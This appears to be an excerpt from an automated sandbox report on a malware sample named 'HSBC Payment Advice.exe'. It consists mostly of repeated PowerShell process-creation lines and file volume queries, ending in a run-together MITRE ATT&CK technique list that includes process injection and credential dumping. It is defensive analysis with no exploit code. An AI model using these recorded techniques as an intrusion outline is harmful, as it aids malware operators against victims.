    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		111
    Process Injection    		11
    Masquerading    		OS Credential Dumping1
    Process Discovery    		Remote Services1
